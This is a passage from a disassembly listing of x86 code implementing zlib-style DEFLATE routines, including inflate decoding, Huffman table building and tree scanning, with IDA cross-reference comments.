mov [edi], dl
jnz short loc_9AFC8F
mov ecx, [ebp+var_28]
dec ecx
mov [ebp+var_10], ecx
mov ecx, [ebp+var_18]
cmp ecx, [ebp+var_C]
jnb short loc_9AFCEA
sub [ebp+var_C], ecx
mov [ebp+var_8], ecx
mov ecx, [ebp+var_10]
loc_9AFCB5: ; CODE XREF: sub_9AFA38+286�j
inc ecx
mov dl, [ecx]
inc edi
dec [ebp+var_8]
mov [edi], dl
jnz short loc_9AFCB5
jmp short loc_9AFCE0
; ---------------------------------------------------------------------------
loc_9AFCC2: ; CODE XREF: sub_9AFA38+23F�j
sub ecx, edx
add [ebp+var_10], ecx
mov ecx, [ebp+var_8]
cmp ecx, [ebp+var_C]
jnb short loc_9AFCEA
sub [ebp+var_C], ecx
mov ecx, [ebp+var_10]
loc_9AFCD5: ; CODE XREF: sub_9AFA38+2A6�j
inc ecx
mov dl, [ecx]
inc edi
dec [ebp+var_8]
mov [edi], dl
jnz short loc_9AFCD5
loc_9AFCE0: ; CODE XREF: sub_9AFA38+23B�j
; sub_9AFA38+288�j
mov ecx, edi
sub ecx, [ebp+var_14]
mov [ebp+var_10], ecx
jmp short loc_9AFCED
; ---------------------------------------------------------------------------
loc_9AFCEA: ; CODE XREF: sub_9AFA38+224�j
; sub_9AFA38+252�j ...
mov ecx, [ebp+var_10]
loc_9AFCED: ; CODE XREF: sub_9AFA38+2B0�j
mov edx, [ebp+var_C]
cmp edx, 2
jbe short loc_9AFD41
lea eax, [edx-3]
push 3
xor edx, edx
pop ecx
div ecx
mov ecx, [ebp+var_10]
inc eax
loc_9AFD03: ; CODE XREF: sub_9AFA38+2E2�j
sub [ebp+var_C], 3
inc ecx
mov dl, [ecx]
inc edi
mov [edi], dl
inc ecx
mov dl, [ecx]
inc edi
inc ecx
mov [edi], dl
mov dl, [ecx]
inc edi
dec eax
mov [edi], dl
jnz short loc_9AFD03
mov eax, [ebp+arg_0]
jmp short loc_9AFD41
; ---------------------------------------------------------------------------
loc_9AFD21: ; CODE XREF: sub_9AFA38+1F5�j
mov ecx, edi
sub ecx, edx
loc_9AFD25: ; CODE XREF: sub_9AFA38+307�j
sub [ebp+var_C], 3
inc ecx
mov dl, [ecx]
inc edi
mov [edi], dl
inc ecx
mov dl, [ecx]
inc edi
inc ecx
mov [edi], dl
mov dl, [ecx]
inc edi
cmp [ebp+var_C], 2
mov [edi], dl
ja short loc_9AFD25
loc_9AFD41: ; CODE XREF: sub_9AFA38+2BB�j
; sub_9AFA38+2E7�j
cmp [ebp+var_C], 0
jz short loc_9AFD59
inc ecx
mov dl, [ecx]
inc edi
cmp [ebp+var_C], 1
mov [edi], dl
jbe short loc_9AFD59
mov cl, [ecx+1]
loc_9AFD56: ; CODE XREF: sub_9AFA38+EF�j
inc edi
mov [edi], cl
loc_9AFD59: ; CODE XREF: sub_9AFA38+30D�j
; sub_9AFA38+319�j
cmp ebx, [ebp+var_2C]
jnb short loc_9AFD95
cmp edi, [ebp+var_30]
jb loc_9AFAB7
jmp short loc_9AFD95
; ---------------------------------------------------------------------------
loc_9AFD69: ; CODE XREF: sub_9AFA38+203�j
mov dword ptr [eax+18h], offset aInvalidDista_1 ; "invalid distance too far back"
jmp short loc_9AFD8F
; ---------------------------------------------------------------------------
loc_9AFD72: ; CODE XREF: sub_9AFA38+166�j
mov dword ptr [eax+18h], offset aInvalidDista_0 ; "invalid distance code"
jmp short loc_9AFD8F
; ---------------------------------------------------------------------------
loc_9AFD7B: ; CODE XREF: sub_9AFA38+BA�j
test cl, 20h
jz short loc_9AFD88
mov dword ptr [esi], 0Bh
jmp short loc_9AFD95
; ---------------------------------------------------------------------------
loc_9AFD88: ; CODE XREF: sub_9AFA38+346�j
mov dword ptr [eax+18h], offset aInvalidLiter_0 ; "invalid literal/length code"
loc_9AFD8F: ; CODE XREF: sub_9AFA38+338�j
; sub_9AFA38+341�j
mov dword ptr [esi], 1Bh
loc_9AFD95: ; CODE XREF: sub_9AFA38+324�j
; sub_9AFA38+32F�j ...
mov ecx, [ebp+arg_4]
shr ecx, 3
sub ebx, ecx
shl ecx, 3
sub [ebp+arg_4], ecx
xor ecx, ecx
inc ecx
mov edx, ecx
mov ecx, [ebp+arg_4]
shl edx, cl
dec edx
mov ecx, edx
mov edx, [ebp+var_4]
and edx, ecx
lea ecx, [ebx+1]
mov [eax], ecx
lea ecx, [edi+1]
mov [eax+0Ch], ecx
mov ecx, [ebp+var_2C]
sub ecx, ebx
add ecx, 5
mov [eax+4], ecx
mov ecx, [ebp+var_30]
sub ecx, edi
add ecx, 101h
mov [eax+10h], ecx
mov eax, [ebp+arg_4]
pop edi
mov [esi+38h], edx
mov [esi+3Ch], eax
pop esi
pop ebx
leave
retn
sub_9AFA38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AFDE7 proc near ; CODE XREF: sub_9AE1BD+8E4�p
; sub_9AE1BD+B01�p ...
var_7C = word ptr -7Ch
var_7A = word ptr -7Ah
var_5C = word ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 7Ch
push ebx
push esi
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_5C]
rep stosd
xor edx, edx
xor ecx, ecx
cmp [ebp+arg_8], edx
jbe short loc_9AFE17
loc_9AFE03: ; CODE XREF: sub_9AFDE7+2E�j
mov eax, [ebp+arg_4]
movzx eax, word ptr [eax+ecx*2]
lea eax, [ebp+eax*2+var_5C]
inc word ptr [eax]
inc ecx
cmp ecx, [ebp+arg_8]
jb short loc_9AFE03
loc_9AFE17: ; CODE XREF: sub_9AFDE7+1A�j
mov esi, [ebp+arg_10]
mov eax, [esi]
push 0Fh
pop ebx
mov [ebp+var_C], eax
mov [ebp+var_1C], ebx
loc_9AFE25: ; CODE XREF: sub_9AFDE7+4C�j
cmp [ebp+ebx*2+var_5C], dx
jnz short loc_9AFE35
dec ebx
cmp ebx, 1
mov [ebp+var_1C], ebx
jnb short loc_9AFE25
loc_9AFE35: ; CODE XREF: sub_9AFDE7+43�j
cmp eax, ebx
jbe short loc_9AFE3C
mov [ebp+var_C], ebx
loc_9AFE3C: ; CODE XREF: sub_9AFDE7+50�j
cmp ebx, edx
jnz short loc_9AFE6B
mov ecx, [ebp+arg_C]
mov word ptr [ebp+arg_8+2], dx
mov edx, [ecx]
mov byte ptr [ebp+arg_8], 40h
mov byte ptr [ebp+arg_8+1], 1
mov eax, [ebp+arg_8]
mov [edx], eax
add dword ptr [ecx], 4
mov edx, [ecx]
mov [edx], eax
add dword ptr [ecx], 4
mov dword ptr [esi], 1
jmp loc_9B0192
; ---------------------------------------------------------------------------
loc_9AFE6B: ; CODE XREF: sub_9AFDE7+57�j
xor edi, edi
inc edi
mov eax, edi
mov [ebp+var_18], eax
loc_9AFE73: ; CODE XREF: sub_9AFDE7+9C�j
xor esi, esi
cmp [ebp+eax*2+var_5C], si
jnz short loc_9AFE85
inc eax
cmp eax, 0Fh
mov [ebp+var_18], eax
jbe short loc_9AFE73
loc_9AFE85: ; CODE XREF: sub_9AFDE7+93�j
cmp [ebp+var_C], eax
jnb short loc_9AFE8D
mov [ebp+var_C], eax
loc_9AFE8D: ; CODE XREF: sub_9AFDE7+A1�j
mov edx, edi
mov ecx, edi
loc_9AFE91: ; CODE XREF: sub_9AFDE7+B9�j
movzx eax, [ebp+ecx*2+var_5C]
add edx, edx
sub edx, eax
js short loc_9AFEAF
inc ecx
cmp ecx, 0Fh
jbe short loc_9AFE91
cmp edx, esi
jle short loc_9AFEB7
cmp [ebp+arg_0], esi
jz short loc_9AFEAF
cmp ebx, edi
jz short loc_9AFEB7
loc_9AFEAF: ; CODE XREF: sub_9AFDE7+B3�j
; sub_9AFDE7+C2�j
or eax, 0FFFFFFFFh
jmp loc_9B0194
; ---------------------------------------------------------------------------
loc_9AFEB7: ; CODE XREF: sub_9AFDE7+BD�j
; sub_9AFDE7+C6�j
push 2
mov [ebp+var_7A], si
pop ecx
loc_9AFEBE: ; CODE XREF: sub_9AFDE7+EB�j
mov ax, [ebp+ecx+var_7C]
add ax, [ebp+ecx+var_5C]
inc ecx
mov [ebp+ecx+var_7C+1], ax
inc ecx
cmp ecx, 1Eh
jb short loc_9AFEBE
xor edx, edx
cmp [ebp+arg_8], esi
jbe short loc_9AFF05
loc_9AFEDB: ; CODE XREF: sub_9AFDE7+11C�j
mov eax, [ebp+arg_4]
lea eax, [eax+edx*2]
cmp [eax], si
jz short loc_9AFEFF
movzx ecx, word ptr [eax]
movzx ecx, [ebp+ecx*2+var_7C]
mov ebx, [ebp+arg_14]
mov [ebx+ecx*2], dx
movzx ecx, word ptr [eax]
lea ecx, [ebp+ecx*2+var_7C]
inc word ptr [ecx]
loc_9AFEFF: ; CODE XREF: sub_9AFDE7+FD�j
inc edx
cmp edx, [ebp+arg_8]
jb short loc_9AFEDB
loc_9AFF05: ; CODE XREF: sub_9AFDE7+F2�j
mov ecx, [ebp+arg_0]
sub ecx, esi
jz short loc_9AFF45
dec ecx
jz short loc_9AFF23
or [ebp+var_14], 0FFFFFFFFh
mov [ebp+var_28], offset dword_9A5660
mov [ebp+var_24], offset dword_9A56A0
jmp short loc_9AFF55
; ---------------------------------------------------------------------------
loc_9AFF23: ; CODE XREF: sub_9AFDE7+126�j
mov ecx, 202h
mov edx, offset dword_9A55E0
sub edx, ecx
mov [ebp+var_28], edx
mov edx, offset dword_9A5620
sub edx, ecx
mov [ebp+var_24], edx
mov [ebp+var_14], 100h
jmp short loc_9AFF55
; ---------------------------------------------------------------------------
loc_9AFF45: ; CODE XREF: sub_9AFDE7+123�j
mov ecx, [ebp+arg_14]
mov [ebp+var_24], ecx
mov [ebp+var_28], ecx
mov [ebp+var_14], 13h
loc_9AFF55: ; CODE XREF: sub_9AFDE7+13A�j
; sub_9AFDE7+15C�j
mov ecx, [ebp+var_C]
mov eax, [ebp+var_18]
mov ebx, [ebp+arg_C]
and [ebp+var_8], 0
or [ebp+var_30], 0FFFFFFFFh
mov edx, edi
shl edx, cl
cmp [ebp+arg_0], edi
mov [ebp+var_4], esi
mov esi, [ebx]
lea ecx, [edx-1]
mov [ebp+var_2C], eax
mov [ebp+var_34], edx
mov [ebp+var_20], edx
mov [ebp+var_38], ecx
jnz short loc_9AFF92
cmp edx, 5B0h
jb short loc_9AFF92
mov eax, edi
jmp loc_9B0194
; ---------------------------------------------------------------------------
loc_9AFF92: ; CODE XREF: sub_9AFDE7+19A�j
; sub_9AFDE7+1A2�j
mov ecx, [ebp+arg_14]
mov [ebp+var_10], ecx
loc_9AFF98: ; CODE XREF: sub_9AFDE7+27C�j
; sub_9AFDE7+28E�j ...
mov cl, al
sub cl, byte ptr [ebp+var_8]
mov byte ptr [ebp+arg_8+1], cl
mov ecx, [ebp+var_10]
mov cx, [ecx]
movzx edx, cx
cmp edx, [ebp+var_14]
jge short loc_9AFFB8
mov byte ptr [ebp+arg_8], 0
loc_9AFFB2: ; CODE XREF: sub_9AFDE7+1EB�j
mov word ptr [ebp+arg_8+2], cx
jmp short loc_9AFFDD
; ---------------------------------------------------------------------------
loc_9AFFB8: ; CODE XREF: sub_9AFDE7+1C5�j
jle short loc_9AFFD4
mov ecx, [ebp+var_10]
movzx ecx, word ptr [ecx]
mov edx, [ebp+var_24]
shl ecx, 1
mov dl, [ecx+edx]
mov byte ptr [ebp+arg_8], dl
mov edx, [ebp+var_28]
mov cx, [ecx+edx]
jmp short loc_9AFFB2
; ---------------------------------------------------------------------------
loc_9AFFD4: ; CODE XREF: sub_9AFDE7:loc_9AFFB8�j
and word ptr [ebp+arg_8+2], 0
mov byte ptr [ebp+arg_8], 60h
loc_9AFFDD: ; CODE XREF: sub_9AFDE7+1CF�j
mov edi, [ebp+var_34]
mov ecx, eax
sub ecx, [ebp+var_8]
mov eax, [ebp+var_4]
xor edx, edx
inc edx
shl edx, cl
mov ecx, [ebp+var_8]
shr eax, cl
mov [ebp+var_18], edi
add eax, edi
lea ecx, [esi+eax*4]
loc_9AFFFA: ; CODE XREF: sub_9AFDE7+223�j
mov eax, edx
shl eax, 2
sub ecx, eax
mov eax, [ebp+arg_8]
sub edi, edx
test edi, edi
mov [ecx], eax
jnz short loc_9AFFFA
mov eax, [ebp+var_2C]
xor edx, edx
lea ecx, [eax-1]
inc edx
shl edx, cl
mov ecx, [ebp+var_4]
jmp short loc_9B001E
; ---------------------------------------------------------------------------
loc_9B001C: ; CODE XREF: sub_9AFDE7+239�j
shr edx, 1
loc_9B001E: ; CODE XREF: sub_9AFDE7+233�j
test edx, ecx
jnz short loc_9B001C
test edx, edx
jz short loc_9B0032
lea edi, [edx-1]
and edi, ecx
add edi, edx
mov [ebp+var_4], edi
jmp short loc_9B0036
; ---------------------------------------------------------------------------
loc_9B0032: ; CODE XREF: sub_9AFDE7+23D�j
and [ebp+var_4], 0
loc_9B0036: ; CODE XREF: sub_9AFDE7+249�j
add [ebp+var_10], 2
lea ecx, [ebp+eax*2+var_5C]
dec word ptr [ecx]
cmp word ptr [ecx], 0
jnz short loc_9B0060
cmp eax, [ebp+var_1C]
jz loc_9B0112
mov eax, [ebp+var_10]
movzx eax, word ptr [eax]
mov ecx, [ebp+arg_4]
movzx eax, word ptr [ecx+eax*2]
mov [ebp+var_2C], eax
loc_9B0060: ; CODE XREF: sub_9AFDE7+25E�j
cmp eax, [ebp+var_C]
jbe loc_9AFF98
mov ecx, [ebp+var_38]
and ecx, [ebp+var_4]
cmp ecx, [ebp+var_30]
mov [ebp+var_3C], ecx
jz loc_9AFF98
mov edi, [ebp+var_8]
test edi, edi
jnz short loc_9B0088
mov edi, [ebp+var_C]
mov [ebp+var_8], edi
loc_9B0088: ; CODE XREF: sub_9AFDE7+299�j
mov ecx, [ebp+var_18]
lea esi, [esi+ecx*4]
xor edx, edx
mov ecx, eax
sub ecx, edi
inc edx
add edi, ecx
shl edx, cl
cmp edi, [ebp+var_1C]
jnb short loc_9B00C6
mov [ebp+var_18], edi
lea eax, [ebp+edi*2+var_5C]
jmp short loc_9B00AA
; ---------------------------------------------------------------------------
loc_9B00A7: ; CODE XREF: sub_9AFDE7+2DD�j
mov eax, [ebp+var_34]
loc_9B00AA: ; CODE XREF: sub_9AFDE7+2BE�j
movzx edi, word ptr [eax]
sub edx, edi
test edx, edx
jle short loc_9B00C6
inc ecx
inc [ebp+var_18]
inc eax
inc eax
mov [ebp+var_34], eax
mov eax, [ebp+var_18]
shl edx, 1
cmp eax, [ebp+var_1C]
jb short loc_9B00A7
loc_9B00C6: ; CODE XREF: sub_9AFDE7+2B5�j
; sub_9AFDE7+2CA�j
xor eax, eax
inc eax
mov edx, eax
shl edx, cl
add [ebp+var_20], edx
cmp [ebp+arg_0], eax
mov [ebp+var_34], edx
jnz short loc_9B00E5
cmp [ebp+var_20], 5B0h
jnb loc_9B0194
loc_9B00E5: ; CODE XREF: sub_9AFDE7+2EF�j
mov edx, [ebp+var_3C]
mov eax, [ebx]
mov [ebp+var_30], edx
shl edx, 2
mov [edx+eax], cl
mov eax, [ebx]
mov cl, byte ptr [ebp+var_C]
mov [edx+eax+1], cl
mov ecx, [ebx]
mov eax, esi
sub eax, ecx
sar eax, 2
mov [edx+ecx+2], ax
mov eax, [ebp+var_2C]
jmp loc_9AFF98
; ---------------------------------------------------------------------------
loc_9B0112: ; CODE XREF: sub_9AFDE7+263�j
mov edi, [ebp+var_4]
and word ptr [ebp+arg_8+2], 0
mov cl, al
sub cl, byte ptr [ebp+var_8]
test edi, edi
mov byte ptr [ebp+arg_8], 40h
mov byte ptr [ebp+arg_8+1], cl
jz short loc_9B0182
jmp short loc_9B012F
; ---------------------------------------------------------------------------
loc_9B012C: ; CODE XREF: sub_9AFDE7+399�j
mov edi, [ebp+var_4]
loc_9B012F: ; CODE XREF: sub_9AFDE7+343�j
cmp [ebp+var_8], 0
jz short loc_9B014B
mov ecx, [ebp+var_38]
and ecx, edi
cmp ecx, [ebp+var_30]
jz short loc_9B014B
mov eax, [ebp+var_C]
and [ebp+var_8], 0
mov esi, [ebx]
mov byte ptr [ebp+arg_8+1], al
loc_9B014B: ; CODE XREF: sub_9AFDE7+34C�j
; sub_9AFDE7+356�j
mov ecx, [ebp+var_8]
mov edx, edi
shr edx, cl
mov ecx, [ebp+arg_8]
mov [esi+edx*4], ecx
xor edx, edx
lea ecx, [eax-1]
inc edx
shl edx, cl
jmp short loc_9B0164
; ---------------------------------------------------------------------------
loc_9B0162: ; CODE XREF: sub_9AFDE7+37F�j
shr edx, 1
loc_9B0164: ; CODE XREF: sub_9AFDE7+379�j
test edx, edi
jnz short loc_9B0162
test edx, edx
jz short loc_9B0178
lea ecx, [edx-1]
and ecx, edi
add ecx, edx
mov [ebp+var_4], ecx
jmp short loc_9B017C
; ---------------------------------------------------------------------------
loc_9B0178: ; CODE XREF: sub_9AFDE7+383�j
and [ebp+var_4], 0
loc_9B017C: ; CODE XREF: sub_9AFDE7+38F�j
cmp [ebp+var_4], 0
jnz short loc_9B012C
loc_9B0182: ; CODE XREF: sub_9AFDE7+341�j
mov eax, [ebp+var_20]
mov ecx, [ebp+var_C]
shl eax, 2
add [ebx], eax
mov eax, [ebp+arg_10]
mov [eax], ecx
loc_9B0192: ; CODE XREF: sub_9AFDE7+7F�j
xor eax, eax
loc_9B0194: ; CODE XREF: sub_9AFDE7+CB�j
; sub_9AFDE7+1A6�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_9AFDE7 endp
; =============== S U B R O U T I N E =======================================
sub_9B0199 proc near ; CODE XREF: sub_9B13EF+1D1�p
push esi
lea ecx, [eax+94h]
mov edx, 11Eh
xor esi, esi
loc_9B01A7: ; CODE XREF: sub_9B0199+15�j
mov [ecx], si
add ecx, 4
dec edx
jnz short loc_9B01A7
push 1Eh
lea ecx, [eax+988h]
pop edx
loc_9B01B9: ; CODE XREF: sub_9B0199+27�j
mov [ecx], si
add ecx, 4
dec edx
jnz short loc_9B01B9
push 13h
lea ecx, [eax+0A7Ch]
pop edx
loc_9B01CB: ; CODE XREF: sub_9B0199+39�j
mov [ecx], si
add ecx, 4
dec edx
jnz short loc_9B01CB
mov [eax+16ACh], esi
mov [eax+16A8h], esi
mov [eax+16B0h], esi
mov [eax+16A0h], esi
mov word ptr [eax+494h], 1
pop esi
retn
sub_9B0199 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B01F7 proc near ; CODE XREF: sub_9B1122+D7�p
; sub_9B1122+10D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [eax+ecx*4+0B5Ch]
mov [ebp+var_4], edx
mov edx, [eax+1450h]
add ecx, ecx
cmp ecx, edx
jg loc_9B0298
push ebx
push esi
loc_9B021A: ; CODE XREF: sub_9B01F7+9D�j
jge short loc_9B0251
mov esi, [eax+ecx*4+0B60h]
mov edx, [eax+ecx*4+0B5Ch]
mov bx, [edi+esi*4]
mov dx, [edi+edx*4]
cmp bx, dx
jb short loc_9B0250
jnz short loc_9B0251
mov dl, [esi+eax+1458h]
mov esi, [eax+ecx*4+0B5Ch]
cmp dl, [esi+eax+1458h]
ja short loc_9B0251
loc_9B0250: ; CODE XREF: sub_9B01F7+3E�j
inc ecx
loc_9B0251: ; CODE XREF: sub_9B01F7:loc_9B021A�j
; sub_9B01F7+40�j ...
mov esi, [eax+ecx*4+0B5Ch]
mov edx, [ebp+var_4]
mov dx, [edi+edx*4]
mov bx, [edi+esi*4]
cmp dx, bx
jb short loc_9B0296
jnz short loc_9B027D
mov edx, [ebp+var_4]
mov dl, [edx+eax+1458h]
cmp dl, [esi+eax+1458h]
jbe short loc_9B0296
loc_9B027D: ; CODE XREF: sub_9B01F7+71�j
mov edx, [ebp+arg_0]
mov [eax+edx*4+0B5Ch], esi
mov edx, [eax+1450h]
mov [ebp+arg_0], ecx
shl ecx, 1
cmp ecx, edx
jle short loc_9B021A
loc_9B0296: ; CODE XREF: sub_9B01F7+6F�j
; sub_9B01F7+84�j
pop esi
pop ebx
loc_9B0298: ; CODE XREF: sub_9B01F7+1B�j
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [eax+edx*4+0B5Ch], ecx
leave
retn
sub_9B01F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B02A7 proc near ; CODE XREF: sub_9B1122+1CB�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 28h
mov ecx, [eax+4]
and [ebp+var_4], 0
mov [ebp+var_20], ecx
push ebx
mov ebx, [eax]
mov eax, [eax+8]
mov ecx, [eax]
mov [ebp+var_28], ecx
mov ecx, [eax+4]
mov [ebp+var_24], ecx
mov ecx, [eax+8]
mov eax, [eax+10h]
push edi
mov [ebp+var_18], ecx
mov [ebp+var_8], eax
xor eax, eax
push 8
lea edi, [edx+0B3Ch]
pop ecx
rep stosd
lea eax, [edx+1454h]
mov ecx, [eax]
mov ecx, [edx+ecx*4+0B5Ch]
and word ptr [ebx+ecx*4+2], 0
mov eax, [eax]
inc eax
mov ecx, 23Dh
cmp eax, ecx
jge loc_9B045B
push esi
lea esi, [edx+eax*4+0B5Ch]
sub ecx, eax
mov [ebp+var_14], esi
mov [ebp+var_1C], ecx
add eax, ecx
loc_9B0319: ; CODE XREF: sub_9B02A7+F6�j
mov ecx, [ebp+var_14]
mov esi, [ecx]
mov ecx, esi
shl ecx, 2
mov [ebp+var_C], ecx
movzx ecx, word ptr [ecx+ebx+2]
movzx ecx, word ptr [ebx+ecx*4+2]
inc ecx
cmp ecx, [ebp+var_8]
jle short loc_9B033C
mov ecx, [ebp+var_8]
inc [ebp+var_4]
loc_9B033C: ; CODE XREF: sub_9B02A7+8D�j
cmp esi, [ebp+var_20]
mov edi, [ebp+var_C]
mov [edi+ebx+2], cx
jg short loc_9B0396
inc word ptr [edx+ecx*2+0B3Ch]
and [ebp+var_10], 0
cmp esi, [ebp+var_18]
jl short loc_9B0366
sub esi, [ebp+var_18]
mov edi, [ebp+var_24]
mov esi, [edi+esi*4]
mov [ebp+var_10], esi
loc_9B0366: ; CODE XREF: sub_9B02A7+B1�j
mov esi, [ebp+var_C]
movzx edi, word ptr [esi+ebx]
mov esi, [ebp+var_10]
add esi, ecx
mov ecx, [ebp+var_28]
imul esi, edi
add [edx+16A8h], esi
test ecx, ecx
jz short loc_9B0396
mov esi, [ebp+var_C]
movzx ecx, word ptr [esi+ecx+2]
add ecx, [ebp+var_10]
imul ecx, edi
add [edx+16ACh], ecx
loc_9B0396: ; CODE XREF: sub_9B02A7+A0�j
; sub_9B02A7+D9�j
add [ebp+var_14], 4
dec [ebp+var_1C]
jnz loc_9B0319
cmp [ebp+var_4], 0
jz loc_9B045A
mov ecx, [ebp+var_8]
lea esi, [edx+ecx*2+0B3Ch]
loc_9B03B7: ; CODE XREF: sub_9B02A7+144�j
mov ecx, [ebp+var_8]
dec ecx
lea edi, [edx+ecx*2+0B3Ch]
jmp short loc_9B03C7
; ---------------------------------------------------------------------------
loc_9B03C4: ; CODE XREF: sub_9B02A7+124�j
dec ecx
dec edi
dec edi
loc_9B03C7: ; CODE XREF: sub_9B02A7+11B�j
cmp word ptr [edi], 0
jz short loc_9B03C4
dec word ptr [edx+ecx*2+0B3Ch]
sub [ebp+var_4], 2
lea ecx, [edx+ecx*2+0B3Eh]
add word ptr [ecx], 2
dec word ptr [esi]
cmp [ebp+var_4], 0
jg short loc_9B03B7
mov ecx, [ebp+var_8]
test ecx, ecx
mov [ebp+var_4], ecx
jz short loc_9B045A
mov [ebp+var_10], esi
loc_9B03FA: ; CODE XREF: sub_9B02A7+1B1�j
mov ecx, [ebp+var_10]
movzx ecx, word ptr [ecx]
test ecx, ecx
mov [ebp+var_14], ecx
jz short loc_9B044D
lea esi, [edx+eax*4+0B5Ch]
loc_9B040E: ; CODE XREF: sub_9B02A7+1A4�j
sub esi, 4
mov ecx, [esi]
dec eax
cmp ecx, [ebp+var_20]
mov [ebp+var_28], esi
jg short loc_9B0447
lea ecx, [ebx+ecx*4]
movzx esi, word ptr [ecx+2]
cmp esi, [ebp+var_4]
jz short loc_9B0441
mov edi, [ebp+var_4]
sub edi, esi
movzx esi, word ptr [ecx]
imul edi, esi
mov si, word ptr [ebp+var_4]
add [edx+16A8h], edi
mov [ecx+2], si
loc_9B0441: ; CODE XREF: sub_9B02A7+17F�j
dec [ebp+var_14]
mov esi, [ebp+var_28]
loc_9B0447: ; CODE XREF: sub_9B02A7+173�j
cmp [ebp+var_14], 0
jnz short loc_9B040E
loc_9B044D: ; CODE XREF: sub_9B02A7+15E�j
dec [ebp+var_4]
sub [ebp+var_10], 2
cmp [ebp+var_4], 0
jnz short loc_9B03FA
loc_9B045A: ; CODE XREF: sub_9B02A7+100�j
; sub_9B02A7+14E�j
pop esi
loc_9B045B: ; CODE XREF: sub_9B02A7+5A�j
pop edi
pop ebx
leave
retn
sub_9B02A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B045F proc near ; CODE XREF: sub_9B1307+10�p
; sub_9B1307+22�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
or [ebp+var_8], 0FFFFFFFFh
push ebx
push esi
push edi
push 7
mov esi, ecx
movzx ecx, word ptr [eax+2]
pop edx
xor ebx, ebx
test ecx, ecx
push 4
pop edi
jnz short loc_9B0485
push 3
mov edx, 8Ah
pop edi
loc_9B0485: ; CODE XREF: sub_9B045F+1C�j
or word ptr [eax+esi*4+6], 0FFFFh
test esi, esi
jl loc_9B0516
add eax, 6
mov [ebp+var_4], eax
inc esi
loc_9B049B: ; CODE XREF: sub_9B045F+B5�j
mov eax, ecx
mov ecx, [ebp+var_4]
movzx ecx, word ptr [ecx]
inc ebx
cmp ebx, edx
jge short loc_9B04AC
cmp eax, ecx
jz short loc_9B050F
loc_9B04AC: ; CODE XREF: sub_9B045F+47�j
cmp ebx, edi
mov edx, [ebp+arg_0]
jge short loc_9B04BF
lea edx, [edx+eax*4+0A7Ch]
add [edx], bx
jmp short loc_9B04EE
; ---------------------------------------------------------------------------
loc_9B04BF: ; CODE XREF: sub_9B045F+52�j
test eax, eax
jz short loc_9B04D9
cmp eax, [ebp+var_8]
jz short loc_9B04D0
inc word ptr [edx+eax*4+0A7Ch]
loc_9B04D0: ; CODE XREF: sub_9B045F+67�j
inc word ptr [edx+0ABCh]
jmp short loc_9B04EE
; ---------------------------------------------------------------------------
loc_9B04D9: ; CODE XREF: sub_9B045F+62�j
cmp ebx, 0Ah
jg short loc_9B04E7
inc word ptr [edx+0AC0h]
jmp short loc_9B04EE
; ---------------------------------------------------------------------------
loc_9B04E7: ; CODE XREF: sub_9B045F+7D�j
inc word ptr [edx+0AC4h]
loc_9B04EE: ; CODE XREF: sub_9B045F+5E�j
; sub_9B045F+78�j ...
xor ebx, ebx
test ecx, ecx
mov [ebp+var_8], eax
jnz short loc_9B04FE
mov edx, 8Ah
jmp short loc_9B0505
; ---------------------------------------------------------------------------
loc_9B04FE: ; CODE XREF: sub_9B045F+96�j
cmp eax, ecx
jnz short loc_9B0509
push 6
pop edx
loc_9B0505: ; CODE XREF: sub_9B045F+9D�j
push 3
jmp short loc_9B050E
; ---------------------------------------------------------------------------
loc_9B0509: ; CODE XREF: sub_9B045F+A1�j
push 7
pop edx
push 4
loc_9B050E: ; CODE XREF: sub_9B045F+A8�j
pop edi
loc_9B050F: ; CODE XREF: sub_9B045F+4B�j
add [ebp+var_4], 4
dec esi
jnz short loc_9B049B
loc_9B0516: ; CODE XREF: sub_9B045F+2F�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B045F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B051B proc near ; CODE XREF: sub_9B09B8+220�p
; sub_9B09B8+22F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
or [ebp+var_14], 0FFFFFFFFh
push ebx
push esi
movzx esi, word ptr [ecx+2]
push edi
push 7
mov [ebp+var_8], esi
pop edi
xor esi, esi
cmp [ebp+var_8], esi
push 4
pop ebx
jnz short loc_9B0544
push 3
mov edi, 8Ah
pop ebx
loc_9B0544: ; CODE XREF: sub_9B051B+1F�j
test edx, edx
jl loc_9B09B3
add ecx, 6
inc edx
mov [ebp+var_C], ecx
mov [ebp+var_18], edx
loc_9B0556: ; CODE XREF: sub_9B051B+492�j
mov ecx, [ebp+var_C]
movzx ecx, word ptr [ecx]
mov edx, [ebp+var_8]
inc esi
cmp esi, edi
mov [ebp+var_10], edx
mov [ebp+var_8], ecx
mov [ebp+var_4], esi
jge short loc_9B0575
cmp edx, ecx
jz loc_9B09A6
